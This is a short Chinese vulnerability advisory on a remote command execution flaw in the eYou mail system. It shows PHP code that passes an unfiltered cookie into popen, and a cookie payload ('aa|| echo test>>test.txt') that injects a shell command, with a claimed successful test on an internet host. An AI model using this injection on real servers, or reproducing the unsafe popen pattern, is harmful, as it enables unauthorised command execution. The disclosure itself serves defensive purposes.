eYou邮件系统远程命令执行

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: eYou邮件系统存在远程命令执行 ### 详细说明: #1 漏洞代码 /grad/admin/domain_logo.php ``` <?php /**修改:王磊 *修改时间:2007-04-09 *修改内容:判断域LOGO的路径 * */ $domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤 $fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令 $res = fread($fp,1024); header('Content-type:image/rgb'); $path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo"; $fp = file($path); foreach($fp as $key => $val){ print($val); } exit; ?> ``` $domain = $_COOKIE['cookie']; //接收cookie值,无任何过滤 $fp = popen("/var/eyou/sbin/hashid ".$domain,'r'); //直接带进了危险函数popen 可远程执行任意命令 #2 漏洞利用 访问http://secmap.cn/grad/admin/domain_logo.php 修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt ### 漏洞证明: # 成功例子 在互联网上成功测试,如图 [<img src="https://images.seebug.org/upload/201403/31152023c6f85fdc104ee69f1d9ba4ecdd8a7d25.jpg" alt="qqq.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/31152023c6f85fdc104ee69f1d9ba4ecdd8a7d25.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息